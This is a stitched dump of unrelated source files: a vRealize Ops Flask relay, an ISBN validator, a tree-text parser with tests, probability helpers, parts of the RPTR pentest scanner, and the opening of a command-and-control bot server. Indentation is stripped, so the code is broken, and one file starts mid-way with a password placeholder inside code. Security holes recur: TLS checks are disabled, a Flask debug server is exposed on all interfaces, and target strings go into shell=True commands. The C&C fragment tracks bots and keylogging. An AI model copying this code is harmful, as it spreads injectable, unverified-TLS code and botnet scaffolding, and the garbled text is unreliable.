app = Flask(__name__)
def GetToken(user, passwd, host):
if not token:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + user + "\",\r\n \"authSource\" : \"local\",\r\n \"password\" : \"" + <PASSWORD> + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=0)
return response.text
elif int(token["validity"])/1000 < time.time():
url = "https://" + host + "/suite-api/api/versions"
headers = {
'authorization': "vRealizeOpsToken " + token["token"],
'accept': "application/json"
}
response = requests.request("GET", url, headers=headers, verify=0)
if response.status_code == 401:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + user + "\",\r\n \"authSource\" : \"local\",\r\n \"password\" : \"" + <PASSWORD> + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=0)
return response.text
else:
return json.dumps(token)
else:
return json.dumps(token)
def GetResourceStatus(name,host):
global token
token = json.loads(GetToken(user, passwd, host))
url = "https://" + host + "/suite-api/api/resources"
querystring = {"name": name}
headers = {
'authorization': "vRealizeOpsToken " + token["token"],
'accept': "application/json",
}
response = requests.request("GET", url, headers=headers, params=querystring, verify=0)
response_parsed = json.loads(response.text)
return response_parsed
def GetActiveAlerts(badge,reskind,host):
global token
print token
token = json.loads(GetToken(user,passwd,host))
url = "https://" + host + "/suite-api/api/alerts/query"
headers = {
'authorization': "vRealizeOpsToken " + token["token"],
'accept': "application/json",
'content-type': "application/json"
}
querypayload = {
'resource-query': {
'resourceKind': [reskind]
},
'activeOnly': True,
'alertCriticality': ["CRITICAL","IMMEDIATE","WARNING","INFORMATION"],
'alertImpact': [badge]
}
response = requests.request("POST", url, headers=headers, json=querypayload, verify=0)
response_parsed = json.loads(response.text)
return response_parsed
@app.route("/<NAME>", methods=['GET'])
def ResourceStatusReport(NAME=None):
statusInfo = GetResourceStatus(NAME,host)
resp = jsonify(**statusInfo), 200
return(resp)
@app.route("/alerts/<BADGE>/<RESOURCEKIND>", methods=['GET'])
def ActiveAlertsQuery(BADGE=None, RESOURCEKIND=None):
alertsQuery = GetActiveAlerts(BADGE,RESOURCEKIND,host)
resp = jsonify(**alertsQuery), 200
return(resp)
def main(PORT):
# Configure logging - overwrite on every start
logging.basicConfig(filename='vropsrelay.log', filemode='w', level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s')
# stdout
root = logging.getLogger()
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
ch.setFormatter(formatter)
root.addHandler(ch)
logging.info("Please navigate to the below URL for the available routes")
if (SSLCERT and SSLKEY):
context = (SSLCERT, SSLKEY)
app.run(host='0.0.0.0', port=PORT, ssl_context=context, threaded=True, debug=True)
else:
app.run(host='0.0.0.0', port=PORT)
if __name__ == "__main__":
PORT = 5001
if (len(sys.argv) == 2):
PORT = sys.argv[1]
main(PORT)
``` |
{
"source": "john-decker/simple_python_scripts",
"score": 4
} |
#### File: john-decker/simple_python_scripts/isbn_validator.py
```python
def isbn_validator(isbn):
running_total=0
multiplier=10
for char in isbn:
if char == "X":
char = "10"
val=int(char)
else:
val=int(char)
new=val*multiplier
running_total += new
multiplier -= 1
is_valid = running_total%11
if is_valid == 0:
return True
else:
return False
def validator_output(isbn):
if isbn_validator(isbn) == True:
message = "ISBN " + isbn + " is valid."
else:
message = "ISBN " + isbn + " is NOT valid."
return message
# eventually reconfigure to accept user input with validation
isbn="0747532699"
isbn2="156881111X"
isbn3="0747532789"
print(validator_output(isbn3))
``` |
{
"source": "johndeighan/PLLParser",
"score": 3
} |
#### File: johndeighan/PLLParser/PLLParser.py
```python
import sys, io, re, pytest
from more_itertools import ilen
from pprint import pprint
from typing import Pattern
from TreeNode import TreeNode
from RETokenizer import RETokenizer
from parserUtils import (
reLeadWS, isAllWhiteSpace, getVersion, rmPrefix, prettyPrint,
traceStr, firstWordOf, chomp, chomp2, runningUnitTests
)
__version__ = getVersion()
# ---------------------------------------------------------------------------
def parsePLL(fh, constructor=TreeNode, *,
debug=False,
**kwargs):
obj = constructor('label')
assert isinstance(obj , TreeNode)
return PLLParser(constructor,
debug=debug,
**kwargs
).parse(fh)
# ---------------------------------------------------------------------------
class PLLParser():
# --- These are the only recognized options
hDefOptions = {
# --- These become attributes of the PLLParser object
'markStr': '*',
'reComment': None,
'reAttr': None,
'tokenizer': None,
'hereDocToken': None,
'commentToken': None
}
# ------------------------------------------------------------------------
def __init__(self, constructor=TreeNode, *,
debug=False,
**kwargs):
self.setOptions(kwargs)
self.constructor = constructor or TreeNode
self.debug = debug
# ------------------------------------------------------------------------
def setOptions(self, hOptions):
# --- Make sure only valid options were passed
for name in hOptions.keys():
if name not in self.hDefOptions:
raise Exception(f"Invalid option: '{name}'")
for name in self.hDefOptions.keys():
if name in hOptions:
value = hOptions[name]
# --- Do some type checking
if name == 'tokenizer':
assert isinstance(value, RETokenizer)
elif name in ('markStr','hereDocToken','commentToken'):
assert type(value) == str
elif name in ('reComment','reAttr'):
assert isinstance(value, Pattern)
else:
value = self.hDefOptions[name]
setattr(self, name, value)
# ------------------------------------------------------------------------
def parse(self, fh):
# --- Returns (rootNode, hSubTrees)
self.numLines = 0
reAttr = self.reAttr
tokzr = self.tokenizer
rootNode = curNode = None
hSubTrees = {}
curLevel = None
debug = self.debug
if debug:
print() # print newline
# --- iter is an iterator. The next value in the iterator
# can be retrieved via nextVal = next(iter)
# We use that to implement HEREDOC syntax
iter = self._generator(fh)
for line in iter:
if debug:
print(f"LINE {self.numLines} = '{traceStr(line)}'", end='')
line = self.chompComment(line)
# if isAllWhiteSpace(line):
if line == '':
if debug:
print(" - skip blank line")
continue
(newLevel, label, marked) = self.splitLine(line)
if debug:
print(f" [{newLevel}, '{label}']")
# --- process first non-empty line
if rootNode == None:
rootNode = curNode = self.mknode(label, tokzr, iter)
# --- This wouldn't make any sense, because the root node
# is returned whether it's marked or not,
# but in case someone does it
if marked:
hSubTrees[firstWordOf(label)] = curNode
curLevel = newLevel
if debug:
print(f" - root node set to '{label}'")
continue
diff = newLevel - curLevel
if diff > 1:
# --- continuation line - append to current node's label
if debug:
print(' - continuation')
curNode['label'] += ' ' + label
# --- Don't change curLevel
elif diff == 1:
assert curNode and isinstance(curNode, self.constructor)
# --- Check for attributes
if reAttr:
result = reAttr.search(label)
if result:
(name, value) = (result.group(1), result.group(2))
if 'hAttr' in curNode:
curNode['hAttr'][name] = value
else:
curNode['hAttr'] = { name: value }
continue
# --- create new child node
if debug:
print(f" - '{label}', new child of '{curNode.asDebugString()}'")
assert not curNode.firstChild
newNode = self.mknode(label, tokzr, iter)
newNode.makeChildOf(curNode)
curNode = newNode
if marked:
hSubTrees[firstWordOf(label)] = curNode
curLevel += 1
elif diff < 0: # i.e. newLevel < curLevel
# --- Move up -diff levels, then create sibling node
if debug:
n = -diff
desc = 'level' if n==1 else 'levels'
print(f' - go up {n} {desc}')
while (curLevel > newLevel):
curLevel -= 1
curNode = curNode.parent
assert curNode
newNode = self.mknode(label, tokzr, iter)
newNode.makeSiblingOf(curNode)
curNode = newNode
if marked:
hSubTrees[firstWordOf(label)] = curNode
elif diff == 0:
# --- create new sibling node
if debug:
print(f" - new sibling of {curNode.asDebugString()}")
assert not curNode.nextSibling
newNode = self.mknode(label, tokzr, iter)
newNode.makeSiblingOf(curNode)
curNode = newNode
if marked:
hSubTrees[firstWordOf(label)] = curNode
else:
raise Exception("What! This cannot happen")
if self.numLines == 0:
raise Exception("parsePLL(): No text to parse")
if not rootNode:
raise Exception("parsePLL(): rootNode is empty")
assert isinstance(rootNode, self.constructor)
return (rootNode, hSubTrees)
# ------------------------------------------------------------------------
def mknode(self, label, tokzr, iter):
# --- Since we implement HEREDOC syntax (by fetching lines
# from iter), we need to fetch tokens now
commentToken = self.commentToken
hereDocToken = self.hereDocToken
node = self.constructor(label)
if tokzr:
lTokens = []
for (type, tokStr) in tokzr.tokens(label):
if commentToken and (type == commentToken):
break
if hereDocToken and (type == hereDocToken):
# --- Grab lines from iterator until no more lines
# or line is all whitespace
lLines = []
s = next(iter)
if self.debug:
print()
print(f"...s = '{s}'")
# --- Check if there's any leading whitespace
leadWS = ''
leadLen = 0
result = reLeadWS.search(s)
if result:
leadWS = result.group(1)
leadLen = len(leadWS)
while s and not isAllWhiteSpace(s):
if leadWS and (s[0:leadLen] != leadWS):
raise SyntaxError("Missing HEREDOC leading whitespace")
s = s[leadLen:]
lLines.append(s + '\n')
s = next(iter, 'any')
if self.debug:
print(f"...s = '{s}'")
rmPrefix(lLines)
lTokens.append([hereDocToken, ''.join(lLines)])
else:
lTokens.append([type, tokStr])
node['lTokens'] = lTokens
return node
# ------------------------------------------------------------------------
# --- Since the generator is used to parse HEREDOC strings, which
# should not have comments stripped, the caller of the generator
# must strip off comments if reComment is set
# The generator will ensure that any trailing '\n' is stripped
def _generator(self, fh):
debug = self.debug
# --- Allow passing in a string
if isinstance(fh, str):
fh = io.StringIO(fh)
# --- We'll need the first line to determine
# if there's any leading whitespace, which will
# be stripped from ALL lines (and therefore must
# be there for every subsequent line)
# NOTE: At this point, we can't be in a HEREDOC string,
# so it's safe to strip comments if reComment is set
# NOTE: If the next line is a blank line, fh.readline()
# will return "\n", which is not falsey
line = self.getLine(fh)
if line == None:
if debug:
print(" GEN: EOF")
return
line = self.chompComment(line)
while line == '':
line = self.getLine(fh)
if line == None:
if debug:
print(" GEN: EOF")
return
line = self.chompComment(line)
# --- Check if there's any leading whitespace
leadWS = ''
leadLen = 0
result = reLeadWS.search(line)
if result:
leadWS = result.group(1)
leadLen = len(leadWS)
if leadWS:
if debug:
print(" GEN: found leading whitespace")
while line != None:
if line: # i.e. not the empty string
# --- Check if the required leadWS is present
if (line[0:leadLen] != leadWS):
raise SyntaxError("Missing leading whitespace")
yield line[leadLen:]
else:
yield ''
line = self.getLine(fh)
else:
if debug:
print(" GEN: no leading whitespace")
while line != None:
yield line
line = self.getLine(fh)
if debug:
print(" GEN: EOF (DONE)")
return
# ------------------------------------------------------------------------
def getLine(self, fh):
# --- Retrieves next line, chomps off any trailing '\n',
# removes any trailing whitespace, increments self.numLines
# Returns None on EOF
line = fh.readline()
if not line:
return None
self.numLines += 1
return chomp(line).rstrip()
# ---------------------------------------------------------------------------
def chompComment(self, line):
reComment = self.reComment
if reComment:
line = re.sub(reComment, '', line)
return line.rstrip()
# ------------------------------------------------------------------------
def splitLine(self, line):
# --- All whitespace lines should never be passed to this function
assert type(line) == str
assert not isAllWhiteSpace(line)
# --- returns (level, label, marked)
# label will have markStr removed
markStr = self.markStr
(indent, label) = chomp2(line)
if ' ' in indent:
raise SyntaxError(f"Indentation '{traceStr(indent)}'"
" cannot contain space chars")
level = len(indent)
# --- Check if the mark string is present
# If so, strip it to get label, then set key = label
marked = False
if markStr:
if (label.find(markStr) == 0):
label = label[len(self.markStr):].lstrip()
if len(label) == 0:
raise SyntaxError("Marked lines cannot be empty")
marked = True
return (level, label, marked)
# ---------------------------------------------------------------------------
# UNIT TESTS
# ---------------------------------------------------------------------------
if runningUnitTests():
def test_1():
(tree, hSubTrees) = parsePLL('''
top
peach
fuzzy
navel
pink
apple
red
''')
n = ilen(tree.children())
assert n == 2
n = ilen(tree.siblings())
assert n == 0
# --- descendents() includes the node itself
n = ilen(tree.descendents())
assert n == 6
assert ilen(tree.firstChild.children()) == 2
assert tree['label'] == 'top'
assert tree.firstChild['label'] == 'peach'
node = tree.firstChild.firstChild
node['label'] == 'fuzzy navel'
# ------------------------------------------------------------------------
def test_2():
# --- Root node can have siblings, i.e. input does not
# need to be a true tree
(tree, hSubTrees) = parsePLL('''
top
peach
fuzzy
navel
pink
apple
red
next
child of next
''')
n = ilen(tree.children())
assert n == 2
n = ilen(tree.siblings())
assert n == 1
# --- descendents() includes the node itself
n = ilen(tree.descendents())
assert n == 6
assert tree['label'] == 'top'
assert tree.firstChild['label'] == 'peach'
assert tree.nextSibling['label'] == 'next'
assert tree.nextSibling.firstChild['label'] == 'child of next'
# ------------------------------------------------------------------------
# Test some invalid input
def test_3():
s = '''
main
peach
apple
'''
with pytest.raises(SyntaxError):
parsePLL(s)
# ------------------------------------------------------------------------
def test_4():
# --- No support for indenting with spaces yet
# Below, both 'peach' and 'apple' are indented with spaces
s = '''
main
peach
apple
'''
with pytest.raises(SyntaxError):
parsePLL(s)
# ------------------------------------------------------------------------
def test_5():
# --- By default, neither comments or attributes are recognized
(tree, hSubTrees) = parsePLL('''
top
number = 5 # not an attribute
peach # not a comment
apple
''')
assert tree['label'] == 'top'
child1 = tree.firstChild
child2 = tree.firstChild.nextSibling
assert child1['label'] == 'number = 5 # not an attribute'
assert child2['label'] == 'peach # not a comment'
# ------------------------------------------------------------------------
# Test if it will parse fragments
def test_5():
s = '''
menubar
file
new
open
edit
undo
layout
row
EditField
SelectField
'''
(tree, hSubTrees) = parsePLL(s, debug=False)
n = ilen(tree.descendents())
assert n == 6
n = ilen(tree.followingNodes())
assert n == 10
# ------------------------------------------------------------------------
# Test marked subtrees
def test_6():
s = '''
App
* menubar
file
new
open
edit
undo
* layout
row
EditField
SelectField
'''
(tree, hSubTrees) = parsePLL(s, debug=False)
subtree1 = hSubTrees['menubar']
subtree2 = hSubTrees['layout']
n = ilen(tree.descendents())
assert n == 11
assert (subtree1['label'] == 'menubar')
n = ilen(subtree1.descendents())
assert n == 6
assert (subtree2['label'] == 'layout')
n = ilen(subtree2.descendents())
assert n == 4
n = ilen(tree.followingNodes())
assert n == 11
# ------------------------------------------------------------------------
# --- Test stripping comments
def test_7():
(node, hSubTrees) = parsePLL('''
bg # a comment
color = \\#abcdef # not a comment
graph
''',
reComment=re.compile(r'(?<!\\)#.*$'), # ignore escaped '#' char
debug=False
)
n = ilen(node.descendents())
assert n == 3
assert node['label'] == 'bg'
assert node.firstChild['label'] == 'color = \\#abcdef'
assert node.firstChild.nextSibling['label'] == 'graph'
# ------------------------------------------------------------------------
# --- test hAttr key
def test_8():
(node,h) = parsePLL('''
mainWindow
*menubar
align=left
flow = 99
--------------
not an option
*layout
life= 42
meaning =42
''',
reAttr=re.compile(r'^(\S+)\s*\=\s*(.*)$'),
)
menubar = h['menubar']
assert menubar
assert isinstance(menubar, TreeNode)
hOptions1 = menubar.get('hAttr')
assert hOptions1 == {
'align': 'left',
'flow': '99',
}
layout = h['layout']
assert layout
assert isinstance(layout, TreeNode)
hOptions2 = layout.get('hAttr')
assert hOptions2 == {
'life': '42',
'meaning': '42',
}
# ------------------------------------------------------------------------
def test_9():
# --- Note that this regexp allows no space before the colon
# and requires at least one space after the colon
reWithColon = re.compile(r'^(\S+):\s+(.*)$')
(node,h) = parsePLL('''
mainWindow
*menubar
align: left
flow: 99
notAnOption : text
notAnOption:moretext
--------------
not an option
*layout
life: 42
meaning: 42
''',
reAttr=reWithColon,
)
menubar = h['menubar']
assert menubar
assert isinstance(menubar, TreeNode)
hOptions1 = menubar.get('hAttr')
assert hOptions1 == {
'align': 'left',
'flow': '99',
}
layout = h['layout']
assert layout
assert isinstance(layout, TreeNode)
hOptions2 = layout.get('hAttr')
assert hOptions2 == {
'life': '42',
'meaning': '42',
}
# ------------------------------------------------------------------------
# Test tokenizing
def test_10():
tokzr = RETokenizer()
assert tokzr
tokzr.add('IDENTIFIER', r'[A-Za-z][A-Za-z0-9_]*')
tokzr.add('INTEGER', r'\d+', 0, int)
tokzr.add('STRING', r'"([^"]*)"', 1)
tokzr.add('STRING', r"'([^']*)'", 1)
(node, hSubTrees) = parsePLL('''
x = 23 + 19
print(x)
''', tokenizer=tokzr)
lTokens = list(node.tokens())
assert lTokens == [
['IDENTIFIER', 'x'],
['OTHER', '='],
['INTEGER', 23],
['OTHER', '+'],
['INTEGER', 19],
]
lTokens = list(node.nextSibling.tokens())
assert lTokens == [
['IDENTIFIER', 'print'],
['OTHER', '('],
['IDENTIFIER', 'x'],
['OTHER', ')'],
]
# ------------------------------------------------------------------------
# Test creating a COMMENT token (but not used yet)
def test_11():
tokzr = RETokenizer()
assert tokzr
tokzr.add('IDENTIFIER', r'[A-Za-z][A-Za-z0-9_]*')
tokzr.add('INTEGER', r'\d+', 0, int)
tokzr.add('STRING', r'"([^"]*)"', 1)
tokzr.add('STRING', r"'([^']*)'", 1)
tokzr.add('COMMENT', r'#')
(node, hSubTrees) = parsePLL('''
x = 23 + 19 # word
print(x) # word
''', tokenizer=tokzr)
lTokens = list(node.tokens())
assert lTokens == [
['IDENTIFIER', 'x'],
['OTHER', '='],
['INTEGER', 23],
['OTHER', '+'],
['INTEGER', 19],
['COMMENT', '#'],
['IDENTIFIER', 'word'],
]
lTokens = list(node.nextSibling.tokens())
assert lTokens == [
['IDENTIFIER', 'print'],
['OTHER', '('],
['IDENTIFIER', 'x'],
['OTHER', ')'],
['COMMENT', '#'],
['IDENTIFIER', 'word'],
]
# ------------------------------------------------------------------------
# Test using commentToken
def test_12():
tokzr = RETokenizer()
assert tokzr
tokzr.add('IDENTIFIER', r'[A-Za-z][A-Za-z0-9_]*')
tokzr.add('INTEGER', r'\d+', 0, int)
tokzr.add('STRING', r'"([^"]*)"', 1)
tokzr.add('STRING', r"'([^']*)'", 1)
tokzr.add('COMMENT', r'#')
(node, hSubTrees) = parsePLL('''
x = 23 + 19 # word
print(x) # word
''',
tokenizer=tokzr,
commentToken='COMMENT',
)
lTokens = list(node.tokens())
assert lTokens == [
['IDENTIFIER', 'x'],
['OTHER', '='],
['INTEGER', 23],
['OTHER', '+'],
['INTEGER', 19],
]
lTokens = list(node.nextSibling.tokens())
assert lTokens == [
['IDENTIFIER', 'print'],
['OTHER', '('],
['IDENTIFIER', 'x'],
['OTHER', ')'],
]
# ------------------------------------------------------------------------
# Test using hereDocToken
def test_13():
tokzr = RETokenizer()
assert tokzr
tokzr.add('IDENTIFIER', r'[A-Za-z][A-Za-z0-9_]*')
tokzr.add('INTEGER', r'\d+', 0, int)
tokzr.add('STRING', r'"([^"]*)"', 1)
tokzr.add('STRING', r"'([^']*)'", 1)
tokzr.add('COMMENT', r'#')
tokzr.add('HEREDOC', r'<<<')
(node, hSubTrees) = parsePLL('''
s = <<<
abc
xyz
print(x)
''',
tokenizer=tokzr,
hereDocToken='HEREDOC',
)
lTokens = list(node.tokens())
prettyPrint(lTokens)
assert lTokens == [
['IDENTIFIER', 's'],
['OTHER', '='],
['HEREDOC', 'abc\nxyz\n'],
]
lTokens = list(node.nextSibling.tokens())
assert lTokens == [
['IDENTIFIER', 'print'],
['OTHER', '('],
['IDENTIFIER', 'x'],
['OTHER', ')'],
]
# ---------------------------------------------------------------------------
# To Do:
# 1. Allow spaces for indentation
``` |
{
"source": "JohnDeJesus22/DataScienceMathFunctions",
"score": 4
} |
#### File: JohnDeJesus22/DataScienceMathFunctions/hypergeometricfunctions.py
```python
import numpy as np
import matplotlib.pyplot as plt
from scipy.special import comb
def hypergeom_pmf(N, A, n, x):
'''
Probability Mass Function for Hypergeometric Distribution
:param N: population size
:param A: total number of desired items in N
:param n: number of draws made from N
:param x: number of desired items in our draw of n items
:returns: PMF computed at x
'''
Achoosex = comb(A,x)
NAchoosenx = comb(N-A, n-x)
Nchoosen = comb(N,n)
return (Achoosex)*NAchoosenx/Nchoosen
def hypergeom_cdf(N, A, n, t, min_value=None):
'''
Cumulative Density Funtion for Hypergeometric Distribution
:param N: population size
:param A: total number of desired items in N
:param n: number of draws made from N
:param t: number of desired items in our draw of n items up to t
:returns: CDF computed up to t
'''
if min_value:
return np.sum([hypergeom_pmf(N, A, n, x) for x in range(min_value, t+1)])
return np.sum([hypergeom_pmf(N, A, n, x) for x in range(t+1)])
def hypergeom_plot(N, A, n):
'''
Visualization of Hypergeometric Distribution for given parameters
:param N: population size
:param A: total number of desired items in N
:param n: number of draws made from N
:returns: Plot of Hypergeometric Distribution for given parameters
'''
x = np.arange(0, n+1)
y = [hypergeom_pmf(N, A, n, x) for x in range(n+1)]
plt.plot(x, y, 'bo')
plt.vlines(x, 0, y, lw=2)
plt.xlabel('# of desired items in our draw')
plt.ylabel('Probablities')
plt.title('Hypergeometric Distribution Plot')
plt.show()
``` |
{
"source": "johndekroon/RPTR",
"score": 3
} |
#### File: RPTR/core/clip.py
```python
import os
import xml.etree.ElementTree as ET
import conf
import re
class Clip():
def __init__(self, bullet_file = None):
#do something
self.url = ""
self.bullets = []
self.clips = []
self.bullets_xml = None
self.port = None
self.save_path = None
self.bullets_dir = conf.get_config('bullets_dir')
self.plugins_dir = conf.get_config('plugins_dir')
if bullet_file == None:
self.bullet_file = conf.get_config('default_bullet')+".xml"
else:
self.bullet_file = bullet_file+".xml"
#read bullet file and extract bullets from it
def read_bullet(self, url):
self.url = url
#try to read the bullet with ElementTree
try:
self.bullets_xml = ET.parse(self.bullets_dir + self.bullet_file).getroot()
#ElementTree can't read the file. The file is unreadable or the XML is corrupt
except:
print " ! Warning: the bullet "+self.bullet_file+" is invalid or not found"
return False
#loop through bullets and add it to the bullet list
for bullet in self.bullets_xml:
self.bullets.append(self.prepare_bullet(bullet.find('execute').text))
#replace placeholders with actual data
def prepare_bullet(self, bullet):
bullet = bullet.replace('[target]', self.url)
bullet = bullet.replace('[path]', self.bullets_dir)
bullet = bullet.replace('[save_path]', self.save_path)
bullet = bullet.replace('[plugins]', self.plugins_dir)
if self.port != None:
bullet = bullet.replace('[port]', self.port)
return bullet
def get_bullets(self):
return self.bullets
def get_clips(self):
return self.clips
def process_results(self, output):
item_count = len(output)
searchObj = None
self.result_list_size = self.getResultListSize(self.bullets_xml)
result_list = [None] * self.result_list_size
for x in range(0, item_count):
output_item = output[x]
id_tool_log = output_item['id']
output_item = output_item ['output']
bullet = self.bullets_xml[x]
loots = bullet.find('loots')
for loot in loots:
regex = loot.find('regex').text
#print regex
searchObj = re.search(regex, output_item)
if searchObj:
new_clip = self.saveFind(loot, 'execute')
if new_clip is not None:
self.clips.append(new_clip)
results = loot.find('results')
try:
for result in results:
id = result.find('id').text
desc = self.saveFind(result, 'description')
result_list.append({'id': id, 'desc': desc, 'id_tool_log': id_tool_log, 'match': searchObj.group(0), 'prove': output})
except:
continue
return self.group_results(result_list)
def group_results(self, result_list):
resultGroupList = [None] * self.result_list_size
for result in result_list:
if result == None:
continue
rid = int(result['id'])
if resultGroupList[rid] == None:
resultGroupList[rid] = {'prove': result['prove'], 'id_tool_log': result['id_tool_log'], 'match': result['match'], 'description': result['desc']}
if result['desc'] == None:
continue
else:
resultGroupList[rid]['description'] = resultGroupList[rid]['description'] + result['desc']
return resultGroupList
def saveFind(self, haystack, needle):
needleObj = haystack.find(needle)
return self.saveText(needleObj)
def saveText(self, obj):
result = None
if obj is not None:
result = str(obj.text)
return result
#if someone knows a better way just send your pull request :)
def getResultListSize(self, bullets):
size = 0
for bullet in bullets:
loots = bullet.find('loots')
try:
for loot in loots:
results = loot.find('results')
for result in results:
id = result.find('id')
if id is not None:
id = int(id.text)
if id > size:
size = id
except:
continue
return int(size)+1
def getBulletFile(self):
return self.bullet_file
def setPort(self, port):
self.port = port
def setSavePath(self, save_path):
self.save_path = save_path
```
#### File: RPTR/core/portscan.py
```python
import os
import subprocess
import time
import urllib2
import difflib
import ssl
from lxml import etree
from dbmanager import *
class Portscan():
def __init__(self, id_test, target, save_path):
self.ports = []
self.id_test = id_test
self.target = target
self.save_path = save_path
self.output = None
#fire bullet
self.dbmanager = Dbmanager()
#management interfaces
self.manif = ['ssh', 'telnet', 'vnc', 'ftp', 'mysql', 'microsoft-ds', 'msrpc']
self.manif_found = False
def parse(self, file_name):
port80 = False
doc = etree.parse(file_name)
for x in doc.xpath("//host[ports/port[state[@state='open']]]"):
for open_p in x.xpath("ports/port[state[@state='open']]"):
item = open_p.attrib.values()
port = item[1]
for child in list(open_p):
service = None
product = None
version = None
tunnel = None
for x in child.attrib.iteritems():
if(x[0] == 'name'):
service = x[1]
if(x[0] == 'product'):
product = x[1]
if(x[0] == 'version'):
version = x[1]
if(x[0] == 'tunnel'):
tunnel = x[1]
#following test is added to prevent double scanning
if port == "80":
port80 = True
if port == "443" and port80:
if self.check_diff_80_443(self.target):
print "80 and 443 are same site"
self.ports.append({"port": port, "service": service, "product": product, "version": version, "tunnel": tunnel, "duplicate": True})
continue
#check if management interface is detected
if service in self.manif:
self.manif_found = True
self.ports.append({"port": port, "service": service, "product": product, "version": version, "tunnel": tunnel, "duplicate": False})
def fire_scan(self):
#get current time
start = time.time()
#start tool execution in new proces
command = "nmap --open --top-ports=50 -sV -oX "+self.save_path+"/nmap_scan.xml "+self.target
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
#get output form process
out, err = p.communicate()
self.output = out
#calculate how much time the tool used
exec_time = time.strftime("%H:%M:%S", time.gmtime(time.time() - start))
#write tool output to database
id_tool_log = self.dbmanager.tool_log_create(self.id_test, command, exec_time, out)
#parse result
self.parse(self.save_path+"/nmap_scan.xml")
#if management ports are open, create a vulnerability for it
if self.manif_found:
self.dbmanager.vulnerability_create(self.id_test, id_tool_log, 1, out)
def get_ports(self):
return self.ports
#check if port 80 and 443 are the same
#used to prevent double scanning a website
def check_diff_80_443(self, url):
try:
url = url.replace("'", "")
f = urllib2.urlopen("http://"+url)
html80 = f.read(25000).replace("http://", "https://")
try:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
f = urllib2.urlopen("https://"+url, context=ctx)
except:
f = urllib2.urlopen("https://"+url)
html443 = f.read(25000)
s = difflib.SequenceMatcher(lambda x: x == " ", html443, html80)
if round(s.ratio(), 3) > 0.75:
return True
return False
except:
return False
```
#### File: RPTR/core/rifle.py
```python
import os
import subprocess
from dbmanager import *
import time
class Rifle:
'shoots bullets'
def __init__(self, id_test, command):
#create new dbmanager
self.dbmanager = Dbmanager()
#fire bullet
self.fire_bullet(id_test, command)
def fire_bullet(self, id_test, command):
os.chdir(os.path.dirname(os.path.abspath(__file__)))
#get current time
start = time.time()
#start tool execution in new proces
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
#get output form process
out, err = p.communicate()
#calculate how much time the tool used
exec_time = time.strftime("%H:%M:%S", time.gmtime(time.time() - start))
#write tool output to database
self.dbmanager.tool_log_create(id_test, command, exec_time, out)
``` |
{
"source": "john-delivuk/lambda-ad-manager",
"score": 2
} |
#### File: john-delivuk/lambda-ad-manager/ad-manager.py
```python
import json
import boto3
import ldap3
import sys
import json
import socket
def add(instance):
#print(instance)
tags = lookup_aws_tags(instance)
instance_ou = instance_ou = config['BaseDN']
if lookup_tag_value(tags,'Application'):
application = lookup_tag_value(tags,'Application')
instance_ou = 'OU={0},{1}'.format(application,config['BaseDN'])
if ou_exists(instance_ou, config['BaseDN']) == False:
create_ou(instance_ou, config['BaseDN'])
ssm_client = boto3.client('ssm')
ssm_client.create_association(
Name=config['SSMDocumentName'],
InstanceId=instance,
Parameters={
'directoryId' : [config['DirectoryId']],
'directoryName' : [config['DomainName']],
'directoryOU' : [instance_ou],
'dnsIpAddresses' : config['DnsServers']
}
)
return True
def ou_exists(ou_name, base_dn):
conn = connect()
obj_filter = '(&(Name={0})(objectCategory=organizationalUnit))'.format(ou_name)
if conn.search(base_dn, obj_filter):
conn.unbind()
return True
else:
conn.unbind()
return False
def create_ou(ou_name, base_dn):
conn = connect()
conn.add('OU={0},{1}'.format(ou_name, base_dn), 'organizationalUnit')
conn.unbind()
return True
def connect():
auth_user_dn = config['UserName']
auth_user_pw = config['Password']
server = ldap3.Server(config['DomainName'], get_info='ALL')
return ldap3.Connection(server, auth_user_dn, auth_user_pw, auto_bind=True)
def get_account_id(context):
return context.invoked_function_arn.split(':')[4]
def get_config(file, env):
try:
target_config_set = json.load(open(file))[env]
except ValueError:
print('Unable to retrive the configuration set {0} from file {1}. Please verify the configuration set exists and the file is readable'.format(env,file))
return target_config_set
def delete(instance):
conn = connect()
base_dn = config['BaseDN']
obj_filter = '(&(Name={0})(objectCategory=computer))'.format(instance)
conn.search(base_dn, obj_filter)
if len(conn.entries) == 1:
target = conn.entries[0].entry_get_dn()
conn.delete(target)
elif len(conn.entries) < 1:
print('No objects we\'re found that match the terminated instance, {0}.'.format(instance))
else:
print('More then one object was returned for your search, as a precaution this program will skip this instance, {0}.'.format(instance))
conn.unbind()
return True
def lookup_aws_tags (instanceid):
ec2_resource = boto3.resource('ec2')
return ec2_resource.Instance(instanceid).tags
def lookup_tag_value(tags, tagName):
try:
value_index = next(index for (index, d) in enumerate(tags) if d["Key"] == tagName)
except StopIteration as err:
return None
else:
return tags[value_index]['Value']
def lambda_handler(event, context):
aws_account_id = get_account_id(context)
global config
config = get_config('./config.json', aws_account_id)
#print(socket.gethostbyname(config['DomainName']))
for record in event['Records']:
message_details = json.loads(record['Sns']['Message'])
if message_details['Event'] == 'autoscaling:EC2_INSTANCE_LAUNCH':
add(message_details['EC2InstanceId'])
elif message_details['Event'] == 'autoscaling:EC2_INSTANCE_TERMINATE':
delete(message_details['EC2InstanceId'])
else:
print('Unable to read event')
print(str(record))
return True
``` |
{
"source": "johndemlon/c-and-c-server",
"score": 3
} |
#### File: c-and-c-server/core/communicate.py
```python
import time
import json
import base64
import threading
from file import File
from ping import Ping
from shell import Shell
from valid import Valid
class Bot(object):
''' Holds bot information '''
def __init__(self, session):
self.system = None
self.location = None
self.keylogging = False
self.session = session
class Communicate(Ping, Valid, File):
'''
[Server]
/ \
/ \
[Master] [Bot]
'''
def __init__(self):
File.__init__(self)
Ping.__init__(self)
Valid.__init__(self)
